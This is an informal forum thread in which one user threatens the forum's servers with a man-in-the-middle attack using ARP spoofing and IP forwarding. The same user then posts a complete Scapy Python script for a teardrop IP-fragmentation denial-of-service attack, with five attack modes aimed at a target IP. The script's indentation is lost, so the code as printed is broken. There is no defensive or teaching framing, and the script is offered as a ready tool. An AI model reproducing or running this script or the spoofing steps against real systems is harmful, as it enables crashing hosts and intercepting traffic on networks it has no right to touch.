31.220.104.16

I don't understand your Jibberish language. No offense because I don't understand a single word you said. xD :p
You sure? You dont understand the Word Yours, security, can and Command o_O woaw
View reply.
 
My Canada vacation starts this week my US vacation starts next or next next week
View reply.
 
I can still do a MIMA (man in middle attack) I can do this by opening 3 terminal and typing in aprspoofing (your ip ) (my ip) so I swap the ip around then I exicute the commands the pass the ip forward which passes the fake ip away then I echo it using echo 1 > /proc/sys/net/ipv4/ip_forward then I got control of your servers for about 30mins we're I can do whatever I want
View reply.
 
I can still do a MIMA (man in middle attack) I can do this by opening 3 terminal and typing in aprspoofing (your ip ) (my ip) so I swap the ip around then I exicute the commands the pass the ip forward which passes the fake ip away then I echo it using echo 1 > /proc/sys/net/ipv4/ip_forward then I got control of your servers for about 30mins we're I can do whatever I want
Does this forums have a good firewall?
View reply.
 
I can still do a MIMA (man in middle attack) I can do this by opening 3 terminal and typing in aprspoofing (your ip ) (my ip) so I swap the ip around then I exicute the commands the pass the ip forward which passes the fake ip away then I echo it using echo 1 > /proc/sys/net/ipv4/ip_forward then I got control of your servers for about 30mins we're I can do whatever I want
Bl server or forums?
View reply.
 
Also I can do a teardrop attack when I send a packet then send a packet then a second 1 which is smaller and is supposed to go in packet 1 but the systems don't regonise it and it crashes the system it's a type of ddos attack
/usr/bin/env python
import sys
from scapy.all import *

total = len(sys.argv)
if total != 3:
print "Performs teardrop attack from Kali Linux"
print " "
print "Usage: ./tear TARGET-IP ATTACK-CODE"
print " Attack Codes:"
print " 0: small payload (36 bytes), 2 packets, offset=3x8 bytes"
print " 1: large payload (1300 bytes), 2 packets, offset=80x8 bytes"
print " 2: large payload (1300 bytes), 12 packets, offset=80x8 bytes"
print " 3: large payload (1300 bytes), 2 packets, offset=3x8 bytes"
print " 4: large payload (1300 bytes), 2 packets, offset=10x8 bytes"


target=str(sys.argv[1])
attack=sys.argv[2]

print 'Attacking target ' + target + ' with attack ' + attack

if attack == '0':
print "Using attack 0"
size=36
offset=3
load1="\x00"*size

i=IP()
i.dst=target
i.flags="MF"
i.proto=17

size=4
offset=18
load2="\x00"*size

j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset

send(i/load1)
send(j/load2)

elif attack == '1':
print "Using attack 1"
size=1300
offset=80
load="A"*size

i=IP()
i.dst=target
i.flags="MF"
i.proto=17

j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset

send(i/load)
send(j/load)

elif attack == '2':
print "Using attack 2"
print "Attacking with attack 2"
size=1300
offset=80
load="A"*size

i=IP()
i.dst=target
i.proto=17
i.flags="MF"
i.frag=0
send(i/load)

print "Attack 2 packet 0"

for x in range(1, 10):
i.frag=offset
offset=offset+80
send(i/load)
print "Attack 2 packet " + str(x)

i.frag=offset
i.flags=0
send(i/load)

elif attack == '3':
print "Using attack 3"
size=1336
offset=3
load1="\x00"*size

i=IP()
i.dst=target
i.flags="MF"
i.proto=17

size=4
offset=18
load2="\x00"*size

j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset

send(i/load1)
send(j/load2)

else: # attack == 4
print "Using attack 4"
size=1300
offset=10
load="A"*size

i=IP()
i.dst=target
i.flags="MF"
i.proto=17

j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset

send(i/load)
send(j/load)

print "Done!"
View reply.
 
This forums can stop automatic attacks but not manual u could also set up a vpn (virtual private network)
View reply.
 

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Back
Top